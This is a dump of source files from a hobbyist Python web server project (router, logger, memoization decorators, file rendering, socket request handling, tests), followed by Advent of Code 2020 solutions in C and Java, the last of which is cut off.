"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1205,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 46,
"path": "/logger.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nhttps://docs.python.org/3/howto/logging-cookbook.html\nhttps://docs.python.org/ko/3/library/logging.handlers.html\n\"\"\"\n\n# TODO logging.ini 파일로 설정 대체\n\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\nfrom utils import create_folder\nfrom utils.klass.singleton import Singleton\n\n__all__ = (\n 'Logger'\n)\n\n\nclass Logger(metaclass=Singleton):\n\n __slots__ = [\"_log\"]\n\n def __init__(self):\n\n create_folder(\"logs\")\n\n self._log = logging.getLogger(\"my\")\n self._log.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s - %(filename)s - %(lineno)s - %(levelname)s - %(message)s')\n\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n\n time_log_handler = TimedRotatingFileHandler(filename='./logs/server.log', when='midnight', interval=1,\n encoding='utf-8')\n time_log_handler.setFormatter(formatter)\n time_log_handler.suffix = \"%Y%m%d\"\n\n self._log.addHandler(time_log_handler)\n self._log.addHandler(stream_handler)\n\n @property\n def log(self):\n return self._log\n"
},
{
"alpha_fraction": 0.6290322542190552,
"alphanum_fraction": 0.6693548560142517,
"avg_line_length": 20.257143020629883,
"blob_id": "b3ae87a8e98b0a381caab883b79b5adb1c1b406c",
"content_id": "f4c79185420f49a06ae968a84cef80eb27c2e5e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 744,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 35,
"path": "/tests/test_api.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport requests\nimport hashlib\n\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\n\ndef get_text_md5_hash(text):\n\tenc = hashlib.md5()\n\tenc.update(text.encode('utf-8'))\n\tenc_text = enc.hexdigest()\n\treturn enc_text\n\n\ndef test_req_index():\n\n\twith requests.Session() as s:\n\t\treq = s.get('http://localhost:65432/')\n\n\t\tassert req.status_code == 200\n\t\tassert req.headers == {'Accept-Charset': 'utf-8'}\n\n\t\treq = s.head('http://localhost:65432/')\n\n\t\tassert req.status_code == 200\n\t\tassert req.headers == {'Accept-Charset': 'utf-8'}\n\n\ndef test_req_static():\n\twith requests.Session() as s:\n\t\treq = s.get('http://localhost:65432/static/css/main.css')\n\n\t\tassert req.status_code == 200\n"
},
{
"alpha_fraction": 0.5747663378715515,
"alphanum_fraction": 0.577102780342102,
"avg_line_length": 15.461538314819336,
"blob_id": "302062d11ba239718d28c7cb3ba33a79692f86a3",
"content_id": "1eb578e93229c65501ab6476702a6e3e4ba1be9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 26,
"path": "/utils/__init__.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\n\n__all__ = (\n 'args_to_str',\n 'string_to_byte',\n 'byte_to_string',\n 'create_folder'\n)\n\n\ndef args_to_str(*args) -> str:\n return ''.join(tuple(map(str, args)))\n\n\ndef string_to_byte(s: str) -> bytes:\n return str.encode(s)\n\n\ndef byte_to_string(b: bytes) -> str:\n return str(b)\n\n\ndef create_folder(dir_name: str):\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n"
},
{
"alpha_fraction": 0.5525423884391785,
"alphanum_fraction": 0.5559322237968445,
"avg_line_length": 15.38888931274414,
"blob_id": "f941d19b2d3f8e421fffd374cab92bdcb4dfe6a3",
"content_id": "c25c213115d4fae09ac9ff9fa96c66063f3d09f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 295,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 18,
"path": "/apis/books.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom http_handler.methods import Methods\n\n__all__ = (\n 'BooksAPI'\n)\n\n\nclass BooksAPI(Methods):\n @staticmethod\n def do_index(req):\n print(\"do_index\")\n return ''\n\n @staticmethod\n def do_create(req):\n print(\"do_create\")\n return ''\n"
},
{
"alpha_fraction": 0.5720164775848389,
"alphanum_fraction": 0.5761317014694214,
"avg_line_length": 14.1875,
"blob_id": "4ba9e7137afb898f036be5722460c0acd4fe1e3a",
"content_id": "aaf4b55c8a41d089fd5f3914f479044802a0911a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 16,
"path": "/apis/orders.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom http_handler.methods import Methods\n\n__all__ = (\n 'OrdersApi'\n)\n\n\nclass OrdersApi(Methods):\n @staticmethod\n def do_show(req):\n return ''\n\n @staticmethod\n def do_update(req):\n return ''\n"
},
{
"alpha_fraction": 0.6352657079696655,
"alphanum_fraction": 0.6376811861991882,
"avg_line_length": 17,
"blob_id": "15acdc828a6157ca649036b4ad118e0e6fa8b136",
"content_id": "d864ac8a8660c03e7df306536422568bb1fa78c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 23,
"path": "/apis/homes.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom http_handler.methods import Methods\nfrom http_handler.render import RenderHandler\nfrom logger import Logger\n\nLOG = Logger().log\n\n__all__ = (\n 'HomesAPI'\n)\n\n\nclass HomesAPI(Methods):\n\n @staticmethod\n def do_index(req):\n return RenderHandler(HomesAPI.__name__, 'index.html')()\n\n @staticmethod\n def do_create(req):\n print(\"home do_create\")\n return ''\n"
},
{
"alpha_fraction": 0.6562731862068176,
"alphanum_fraction": 0.6644394993782043,
"avg_line_length": 34.44736862182617,
"blob_id": "08bcff20fcd6187df8c972e330be90f85a525594",
"content_id": "1562a488b98a629a5d7926718adf164bcee3955b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1377,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 38,
"path": "/tests/test_router.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport types\n\n# TODO 해당 구문 쉽게 쓸수 있는지 확인하기\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nfrom apis.books import BooksAPI\nfrom apis.homes import HomesAPI\nfrom apis.orders import OrdersApi\nfrom router.router import Router\n\n\nmapping_list = [\n\t# path, {method: func,}\n\t(r\"/\", {\"GET\": HomesAPI.do_index, \"POST\": HomesAPI.do_create}),\n\t(r\"/api/books/\", {\"GET\": BooksAPI.do_index, \"POST\": BooksAPI.do_create}),\n\t(r\"/api/books/{id:int}/\", {\"GET\": BooksAPI.do_index, \"PUT\": BooksAPI.do_create}),\n\t(r\"/api/orders/\", {\"GET\": OrdersApi.do_show, \"POST\": OrdersApi.do_update})\n]\n\nrouter = Router(mapping_list)\nrouter2 = Router(mapping_list)\n\n\ndef test_router_singleton():\n\tassert id(router) == id(router2)\n\n\ndef test_router_lookup():\n\tassert router.lookup(\"GET\", \"/\") == (HomesAPI.do_index, [])\n\tassert router.lookup(\"GET\", \"/api/books/\") == (BooksAPI.do_index, [])\n\tassert router.lookup(\"POST\", \"/api/books/\") == (BooksAPI.do_create, [])\n\tassert router.lookup(\"GET\", \"/api/orders/\") == (OrdersApi.do_show, [])\n\tassert router.lookup(\"POST\", \"/api/orders/\") == (OrdersApi.do_update, [])\n\tassert router.lookup(\"GET\", \"/api/books/123/\") == (BooksAPI.do_index, [types.SimpleNamespace(name='id', type='int', data='123')])\n\tassert router.lookup(\"GET\", \"/api/books/23/test/\") == (None, None)\n"
},
{
"alpha_fraction": 0.577363908290863,
"alphanum_fraction": 0.5802292227745056,
"avg_line_length": 14.48888874053955,
"blob_id": "28d09e996b42aeb48a0f29c1c083d2d947e4deba",
"content_id": "159492c7d745a62319c32cef2f19a40d6d761b27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1082,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 45,
"path": "/README.md",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# python_web_server\n\n파이썬 웹 서버 \n- 1단계 : 서버 기초 기능 구현\n- 2단계 : 디비 및 상호작용 구현 -> 프레임워크로 변경 예정 \n\n\n\n### 구조\n- apis/ : 비지니스 로직 및 해당 메소드 구현 클래스 모음\n- http : http 통신 관련 클래스 및 선언 모음\n- logs/ : 로그 파일 저장 디렉토리(날짜별로 저장) \n- tests/ : 유닛 및 전체 테스트 클래스 모음 \n- parser/ : 통신 객체의 파서 클래스 \n- router/ : 통신 요청 url 객체 클래스\n- static/ : 이미지/css 등의 static 폴더 \n- template : html 템플릿 폴더 \n- handle :\n- logger :\n- main :\n- singleton : singleton 구현 클래스 \n- urls : \n- urtils : \n- web_server : \n\n\n### 로그 규칙\n- debug : 예정....\n- info : 정보확인용\n- error : exception의 에러 확인용\n\n\n\n### 사용 단어집\n\n- 숫자 : int\n- 문자열 : str\n- 바이트 : byte\n- 바이트문자열 : bytes\n- 파라미터 : param\n- 파라미터들 : params\n- 요청 : request / req\n- 응답 : response / res\n- 접두사 : prefix\n- 정규표현식 : regx \n"
},
{
"alpha_fraction": 0.5137494802474976,
"alphanum_fraction": 0.5163683891296387,
"avg_line_length": 22.86458396911621,
"blob_id": "eaa88c9305841a11beff30810c0944116639aa63",
"content_id": "03d60c1116309b7e10eae29a531c73cbb1d6b2ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2299,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 96,
"path": "/utils/decorator/memoization.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom functools import wraps, partial\nfrom collections import Hashable\n\n\n__all__ = (\n \"LRU\",\n \"Memoized\",\n \"memoize\"\n)\n\n# TODO cache_size 에러 체크\n\n\nclass LRU:\n \"\"\"Decorator\n Least Recently Used (LRU)\n \"\"\"\n __slots__ = [\"func\", \"cache_list\", \"cache_dict\", \"cache_size\"]\n\n def __init__(self, cache_size=128):\n self.cache_dict = {}\n self.cache_list = []\n self.cache_size = cache_size\n\n def __call__(self, func):\n def wrapper(*args, **kwargs):\n if not isinstance(args, Hashable):\n return func(*args)\n\n key = str(args) + str(kwargs)\n\n if key in self.cache_list:\n self.cache_list.remove(key)\n self.cache_list.append(key)\n elif self.cache_size > 0:\n if len(self.cache_list) == self.cache_size:\n del self.cache_list[0]\n del self.cache_dict[key]\n self.cache_list.append(key)\n self.cache_dict[key] = func(*args, **kwargs)\n else:\n self.cache_list.append(key)\n self.cache_dict[key] = func(*args, **kwargs)\n\n return self.cache_dict[key]\n\n return wrapper\n\n def __repr__(self):\n return self.func.__doc__\n\n def __get__(self, instance, owner):\n return partial(self.__call__, instance)\n\n\nclass Memoized:\n \"\"\"Decorator.\n Caches a function's return value.\n \"\"\"\n\n __slots__ = [\"func\", \"cache\"]\n\n def __init__(self, func):\n self.func = func\n self.cache = {}\n\n def __call__(self, *args, **kwargs):\n if not isinstance(args, Hashable):\n return self.func(*args)\n\n if args in self.cache:\n return self.cache[args]\n else:\n value = self.func(*args)\n self.cache[args] = value\n return value\n\n def __repr__(self):\n return self.func.__doc__\n\n def __get__(self, instance, owner):\n return partial(self.__call__, instance)\n\n\ndef memoize(func):\n cache = {}\n\n @wraps(func)\n def momoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n\n return momoizer\n"
},
{
"alpha_fraction": 0.5523710250854492,
"alphanum_fraction": 0.5541948676109314,
"avg_line_length": 26.028169631958008,
"blob_id": "76c0bd1ce276c8909bca8233496b0f143c46d048",
"content_id": "31c6973000c3a4b3a11c94aac93f5d9ba9ccb2c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3918,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 142,
"path": "/router/router.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# https://www.slideshare.net/kwatch/how-to-make-the-fastest-router-in-python\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nimport re\nimport types\n\nfrom logger import Logger\nfrom utils.klass.singleton import Singleton\nfrom utils.decorator.memoization import Memoized\nfrom http_handler.render import StaticFileHandler\n\nLOG = Logger().log\n\n\n__all__ = (\n 'Router', 'StaticHandler'\n)\n\n\ndef prefix_str(s):\n return s.split('{', 1)[0]\n\n\ndef replace_params_rexp(path):\n\n # int 정규형\n replace_path = re.sub('\\{\\w*:int\\}', '\\d*', path)\n # str 정규형\n replace_path = re.sub('\\{\\w*:str\\}', '\\w*', replace_path)\n\n return re.compile(replace_path)\n\n\nSTATIC_FOLDER = \"/static/\"\n\n\n# TODO warrning 처리 하기\nclass Router(object, metaclass=Singleton):\n __slots__ = [\"mapping_list\", \"mapping_dict\"]\n\n def __init__(self, mapping):\n self.mapping_list = []\n self.mapping_dict = {}\n for path, funcs in mapping:\n\n if '{' not in path:\n self.set_head_method(funcs)\n self.mapping_dict[path] = (funcs, [])\n continue\n\n prefix = prefix_str(path)\n regx_path = replace_params_rexp(path)\n\n self.mapping_list.append((prefix, regx_path, path, funcs))\n\n @Memoized\n def lookup(self, req_method: str, req_path: str) -> tuple:\n \"\"\"\n 요청된 method / path 에 맞는 api 객체 반환\n \"\"\"\n\n if req_path.startswith(STATIC_FOLDER) and req_method == 'GET':\n return StaticHandler.do_index, []\n\n path_dict = self.mapping_dict.get(req_path)\n\n if path_dict:\n funcs, parms = path_dict\n func = funcs.get(req_method)\n return func, []\n\n for prefix, regx_path, path, funcs in self.mapping_list:\n if not req_path.startswith(prefix):\n continue\n\n path_match = regx_path.match(req_path)\n\n if not path_match:\n continue\n\n req_params = []\n path_split = path.split(\"/\")\n req_path_split = req_path.split(\"/\")\n\n if len(path_split) != len(req_path_split):\n continue\n\n for origin_data, req_data in zip(path_split, req_path_split):\n if origin_data == req_data:\n continue\n\n parameter_name, parameter_type = re.search(\"\\{(\\w*):(\\w*)\\}\", origin_data).groups()\n data = types.SimpleNamespace(name=parameter_name, type=parameter_type, data=req_data)\n req_params.append(data)\n\n func = funcs.get(req_method)\n return func, req_params\n\n return None, None\n\n def set_head_method(self, funcs: dict):\n \"\"\"\n get 메소드가 있을 경우, head 메소드 추가\n \"\"\"\n\n if 'GET' not in funcs.keys():\n return\n\n if isinstance(funcs['GET'], types.FunctionType): # function\n module_name = funcs['GET'].__module__\n class_name = funcs['GET'].__qualname__\n func_name = funcs['GET'].__name__\n\n api_import = __import__(module_name, globals(), locals(), [], 0)\n file_name = module_name.split(\".\")[-1]\n class_name = class_name.replace(\".\" + func_name, \"\")\n\n method_to_call = getattr(api_import, file_name)\n class_call = getattr(method_to_call, class_name)\n\n funcs['HEAD'] = class_call.do_head\n\n else: # method\n pass\n\n return\n\n\nclass StaticHandler:\n \"\"\"\n static 파일 요청 핸들러\n \"\"\"\n @staticmethod\n def do_index(req):\n static_file_path = req.url.replace(STATIC_FOLDER, \"\").split(\"/\")\n file_name = static_file_path[-1]\n file_path = static_file_path[:-1]\n\n return StaticFileHandler(os.path.join(*file_path), file_name)()\n"
},
{
"alpha_fraction": 0.5758450031280518,
"alphanum_fraction": 0.5766693949699402,
"avg_line_length": 25.955554962158203,
"blob_id": "06b10ca1f0b007986b15c8ae53c26b8f20c94add",
"content_id": "7c789949ddaf18177b8bf64f6bd51001fd2a2e76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2440,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 90,
"path": "/http_handler/render.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\n\nTEMPLATE_FOLDER = \"template\"\nSTATIC_FOLDER = \"static\"\n\n\nclass FolderError(Exception):\n __slots__ = ['msg']\n\n def __init__(self, msg='folder not find'):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass FileError(Exception):\n __slots__ = ['msg']\n\n def __init__(self, msg='File not find'):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass FileImp:\n __slots__ = [\"folder_path\", \"file_name\", \"default_path\"]\n\n def __init__(self, default_path,\n folder_path,\n file_name):\n self.folder_path = folder_path\n self.file_name = file_name\n self.default_path = default_path\n\n def __repr__(self):\n return \"{} {} {}\".format(self.default_path, self.folder_path, self.file_name)\n\n def exist_folder(self) -> bool:\n return os.path.isdir(os.path.join(self.default_path, self.folder_path))\n\n def exist_file(self) -> bool:\n return os.path.exists(os.path.join(self.default_path, self.folder_path, self.file_name))\n\n def read_file(self) -> str:\n file_path = os.path.join(self.default_path, self.folder_path, self.file_name)\n with open(file_path, encoding='utf8') as f:\n contents = f.read()\n return contents\n\n\n# TODO 템플릿 언어 적용\nclass RenderHandler(FileImp):\n def __init__(self, folder_path: str, file_name: str):\n super().__init__(TEMPLATE_FOLDER, folder_path, file_name)\n\n def __call__(self, *args, **kwargs):\n\n if self.exist_folder() is False:\n raise FolderError\n\n if self.exist_file() is False:\n raise FileError\n\n return self.read_file()\n\n\nclass StaticFileHandler(FileImp):\n def __init__(self, folder_path: str, file_name: str):\n super().__init__(STATIC_FOLDER, folder_path, file_name)\n\n def __call__(self, *args, **kwargs):\n\n if self.exist_folder() is False:\n raise FolderError\n\n if self.exist_file() is False:\n raise FileError\n\n if self.file_name.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):\n return self.read_image_file()\n else:\n return self.read_file()\n\n def read_image_file(self) -> str:\n file_path = os.path.join(self.default_path, self.folder_path, self.file_name)\n stream = open(file_path, \"rb\")\n return stream.read()\n"
},
{
"alpha_fraction": 0.5795207023620605,
"alphanum_fraction": 0.5838779807090759,
"avg_line_length": 18.95652198791504,
"blob_id": "5b1a8e1f483b770fcbc767cba3f6f70f8310086c",
"content_id": "7e0ac7b1319a5ba179533db02d4524dbdd5a0398",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 553,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 23,
"path": "/main.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# TODO test 로직 추가 하기\n# TODO .env 상수 적용하기\n# TODO 미들웨어 구현하기\n# TODO cache 구현\n# -------------------- WAS ------------------------\n# TODO http method 구현하기\n# TODO wsgi 호환\n# TODO weakref 객체 확인하기\n# TODO 초기 파라미터 셋팅 (debug, log, template 등)\n# TODO CORS 구현\n# TODO http2 적용\n\nfrom http_handler.web_server import WebServer\nfrom logger import Logger\n\nLOG = Logger().log\n\nif __name__ == '__main__':\n LOG.info(\"server start!!!\")\n\n WebServer()()\n"
},
{
"alpha_fraction": 0.5599400401115417,
"alphanum_fraction": 0.5644355416297913,
"avg_line_length": 26.677419662475586,
"blob_id": "0c551eb4f132529572361e1e38f7f0e8c4d90d9c",
"content_id": "d7f1e11720a21a495edc49781946ed5084777cd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6034,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 217,
"path": "/http_handler/handle.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport selectors\nfrom operator import eq\n\nfrom http_handler import HTTPStatus\nfrom http_handler.urls import router\nfrom logger import Logger\nfrom parser.parser import ParserHttp\nfrom utils import args_to_str, string_to_byte\nfrom utils.decorator.memoization import LRU\n\nLOG = Logger().log\n\nresponses_code = {\n v.value: (v.phrase, v.description) for v in HTTPStatus.__members__.values()\n}\n\n__all__ = (\n 'Handle',\n 'RequestHandler',\n 'ResponseHandler'\n)\n\ndefault_headers = [('Accept-Charset', 'utf-8')]\n\n\nclass ServerError(Exception):\n __slots__ = ['msg']\n\n def __init__(self, msg='server error'):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\n# TODO 상황별 http code 로직 추가\n\n\nclass Handle:\n\n __slots__ = [\"selector\", \"sock\", \"addr\", \"_recv_buffer\", \"_send_buffer\", \"_json_header_len\", \"request\"]\n\n def __init__(self, selector, sock, addr):\n self.selector = selector\n self.sock = sock\n self.addr = addr\n self._recv_buffer = b\"\"\n self._send_buffer = b\"\"\n self._json_header_len = None\n self.request = None\n\n def process_events(self, mask):\n if mask & selectors.EVENT_READ:\n self.read()\n if mask & selectors.EVENT_WRITE:\n self.write()\n\n def read(self):\n self._read()\n\n if self._recv_buffer:\n req_line, request_headers = ParserHttp()(self._recv_buffer)\n self.request = RequestHandler(req_line, request_headers)\n LOG.info(self.request)\n\n # only HTTP or 1.0 이하는 에러\n if self.request is None or not self.request.protocol.startswith(\"HTTP/\") or \\\n self.request.version < ('1', '0'):\n self.send_error(self.request.protocol, 400, default_headers)\n\n # TODO body 확인\n\n def _read(self):\n try:\n data = self.sock.recv(4096)\n except BlockingIOError:\n pass\n else:\n if data:\n self._recv_buffer += data\n else:\n raise RuntimeError(\"Peer closed.\")\n\n def write(self):\n\n if not self.request or not self.request.method or not self.request.url:\n return\n\n try:\n self.request.handler = router.lookup(self.request.method, self.request.url)\n self._write(self.request)\n except Exception as e:\n LOG.error(repr(e))\n raise ServerError\n\n def _write(self, request):\n if not self._recv_buffer:\n self.send_error(self.request, 400)\n\n elif eq(request.handler, (None, None)):\n self.send_error(self.request, 404)\n\n else:\n try:\n ret_data = self.get_response_data(request)\n\n response_data = ResponseHandler(request, 200, ret_data)()\n\n LOG.info(response_data)\n\n self.send(response_data)\n except Exception as e:\n LOG.error(repr(e))\n self.send_error(self.request, 400)\n\n self.close()\n\n @LRU()\n def get_response_data(self, request):\n ret_data = ''\n api_handler, params = request.handler\n\n if api_handler is None:\n return ret_data\n\n ret_data = api_handler(request)\n\n if ret_data is None:\n raise ServerError\n\n return ret_data\n\n def send(self, send_data):\n try:\n self.sock.send(string_to_byte(send_data))\n except BlockingIOError:\n pass\n except Exception as e:\n LOG.error(repr(e))\n\n def send_error(self, request, code):\n res_data = ResponseHandler(request, code, '')()\n self.send(res_data)\n self.request = None\n\n def close(self):\n LOG.info(args_to_str(\"closing connection to\", self.addr))\n try:\n self.selector.unregister(self.sock)\n except Exception as e:\n LOG.error(repr(e))\n\n try:\n self.sock.close()\n except OSError as e:\n LOG.error(repr(e))\n finally:\n self.sock = None\n\n\nclass RequestHandler:\n __slots__ = [\"method\", \"url\", \"protocol\", \"version\", \"params\", \"headers\", \"body\", \"handler\", \"content_type\"]\n\n def __init__(self, request_line, request_headers):\n self.method = request_line['method']\n self.url = request_line['url']\n self.protocol = request_line['protocol']\n self.version = request_line['version']\n self.params = request_line['params']\n self.headers = request_headers\n self.body = None\n self.handler = None\n self.content_type = request_line['content_type']\n\n def __repr__(self):\n return \"{} {} {} {}\".format(self.__class__, self.method, self.url, self.params)\n\n\nclass ResponseHandler:\n\n __slots__ = [\"code\", \"message\", \"protocol\", \"headers_buffer\", \"body\"]\n\n def __init__(self, request, code, body):\n self.code = code\n self.message = responses_code[code][0]\n self.protocol = request.protocol\n self.body = '' if body is None else body\n self.headers_buffer = self.set_headers((\"content-type\", request.content_type))\n\n self.headers_buffer.append(\"\\r\\n\")\n\n def __call__(self, *args, **kwargs) -> str:\n\n _wfile = \"{} {} {}\".format(self.protocol, self.code, self.message)\n _wfile += \"\\r\\n\"\n _wfile += \"\".join(self.headers_buffer)\n\n if len(self.body) > 0:\n _wfile += \"{}\\r\\n\".format(self.body)\n return _wfile\n\n def set_headers(self, content_type) -> list:\n\n headers_buffer = []\n\n for keyword, value in default_headers:\n headers_buffer.append((\"{}: {}\\r\\n\".format(keyword, value)))\n\n key, val = content_type\n headers_buffer.append(\"{}: {}\\r\\n\".format(key, val))\n headers_buffer.append(\"{}: {}\\r\\n\".format('Accept-Ranges', 'bytes'))\n\n content_len = len(self.body)\n headers_buffer.append(\"{}: {}\\r\\n\".format('Content-Length', content_len))\n\n return headers_buffer\n"
}
] | 18 |
kstrahilova/AdventOfCode2020Public
|
https://github.com/kstrahilova/AdventOfCode2020Public
|
4ddf725a0eae407dd85b56d051af6d0ec4840684
|
48ef996951a440eef004fd28e300702ecd2a2519
|
27725c6d7450a9c3ce1fde156fb8fb680eed32f8
|
refs/heads/main
| 2023-02-03T05:21:47.932992 | 2020-12-21T18:19:49 | 2020-12-21T18:19:49 | 317,956,170 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5116924047470093,
"alphanum_fraction": 0.5287356376647949,
"avg_line_length": 26.72527503967285,
"blob_id": "5d1ea7a53086bec1880492a15495897e4f669c0e",
"content_id": "369926ca9f8293d4e2b2f19c56fa5b0e6211caa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2523,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 91,
"path": "/Challenge2.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n\nstatic void process_entry_policy_1(char * entry, int * n) {\n //printf(\"entry is %s\\n\", entry);\n\n char condition;\n int total = 0;\n char * rest;\n int at_least = strtol(entry, &rest, 10);\n //printf(\"at_least is %d\\n\", at_least);\n //printf(\"rest is %s\\n\", rest);\n int at_most = -1 * strtol(rest, &rest, 10);\n //printf(\"at_most is %d\\n\", at_most);\n //printf(\"rest is %s\\n\", rest);\n\n for (int i = 0; i < strlen(rest); i++) {\n\n if (rest[i] == ':') {\n condition = rest[i - 1];\n //printf(\"condition is %c\\n\", condition);\n } else if (rest[i] == condition) {\n total = total + 1;\n }\n //printf(\"rest[%d] is %c\\n\", i, rest[i]);\n }\n\n //printf(\"total = %d\\n\", total);\n if (total >= at_least && total <= at_most) {\n *n = *n + 1;\n }\n //printf(\"n is equal to %d\\n\", *n);\n}\n\nstatic void process_entry_policy_2(char * entry, int * n) {\n //printf(\"entry is %s\\n\", entry);\n\n char condition;\n int total = 0;\n char * rest;\n //add -1 at end because they start counting at 1\n int index1 = strtol(entry, &rest, 10) - 1;\n int index2 = -1 * strtol(rest, &rest, 10) - 1;\n int start;\n\n for (int i = 0; i < strlen(rest); i++) {\n\n if (rest[i] == ':') {\n condition = rest[i - 1];\n //printf(\"condition is %c\\n\", condition);\n start = i + 2;\n break;\n }\n }\n\n //printf(\"total = %d\\n\", total);\n\n //printf(\"Letter at the first index is %c and on the second %c\\n\", rest[start + index1], rest[start + index2]);\n if ((rest[start + index1] == condition && rest[start + index2] != condition) || (rest[start + index1] != condition && rest[start + index2] == condition)) {\n *n = *n + 1;\n }\n //printf(\"n is equal to %d\\n\", *n);\n}\n\nint main() {\n FILE *input;\n input = fopen(\"inputChallenge2.txt\", \"r\");\n\n //arbitrarily set\n int max = 1001;\n int n_correct = 0;\n char entry[max];\n\n\n //while the strings are the same, and we have successfully read an entry\n //while (strcmp(fgets(entry, max, input), entry) == 0) {\n while (fgets(entry, max, input) != NULL) {\n process_entry_policy_2(entry, &n_correct);\n }\n\n printf(\"Number of correct passwords is %d\\n\", n_correct);\n\n /*int close_status = fclose(input);\n if (close_status == -1) {\n perror(\"Could not close the file\");\n }*/\n}\n"
},
{
"alpha_fraction": 0.5125795602798462,
"alphanum_fraction": 0.516217052936554,
"avg_line_length": 32.663265228271484,
"blob_id": "f3c03c9a1e67e91d5f397c76563e12f402221d96",
"content_id": "ecb7c5a22c156e10f9ae10c91a1112b1df97f7f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3299,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 98,
"path": "/Challenge9/src/Main.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.io.File;\nimport java.io.FileNotFoundException;\nimport java.math.BigInteger;\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.List;\nimport java.util.Scanner;\n\n//TODO: FOR PART II: BACKTRACKING - WE WANT TO FIND ALL POSSIBLE SUBSETS AND CHECK THEIR SUMS\npublic class Main {\n\n private static boolean checkSumOfSubset(List<BigInteger> subset, BigInteger target) {\n BigInteger sum = new BigInteger(\"0\");\n for (BigInteger number : subset) {\n sum = sum.add(number);\n }\n\n return sum.equals(target);\n }\n\n private static BigInteger checkSumOfAllSubsets(ArrayList<BigInteger> input, BigInteger target) {\n for (int size = 1; size <= input.size(); size++) {\n //if excl: + 1\n for (int i = 0; i < input.size() - size; i++) {\n List<BigInteger> subset = input.subList(i, i + size + 1);\n if (checkSumOfSubset(subset, target)) {\n return Collections.min(subset).add(Collections.max(subset));\n }\n }\n }\n\n return null;\n }\n\n private static boolean check_number(ArrayList<BigInteger> preamble, 